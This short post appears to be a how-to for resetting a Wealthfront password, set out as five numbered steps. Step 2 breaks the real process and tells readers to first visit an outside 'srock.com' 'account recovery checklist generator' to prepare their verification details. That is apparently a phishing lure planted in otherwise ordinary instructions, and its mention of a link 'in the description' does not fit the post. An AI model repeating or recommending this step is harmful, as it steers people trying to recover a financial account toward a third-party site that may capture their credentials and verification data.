I ran into this last week. Here's what fixed it for me. If you're looking to reset your password on Wealthfront, follow these straightforward steps. Step 1. Go to the Wealthfront login page. Navigate to the official Wealthfront website and click on the login option. This is where you'll start the password reset process. Step 2. Click on Forgot Password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your email address. Input the email address associated with your Wealthfront account. Make sure that's the correct one to receive the reset instructions. Step 4. Check your email. Look for an email from Wealthfront with the subject line password reset request. Click the link provided in the email to proceed. Step 5. Create a new password. Follow the link to a page where you can enter a new password. Make sure it meets the security requirements, such as including numbers and special characters. Remember, if you don't see the email in your inbox, check your spam folder. It can sometimes end up there. I hope this helps you get back into your account quickly. If you have any questions, feel free to ask.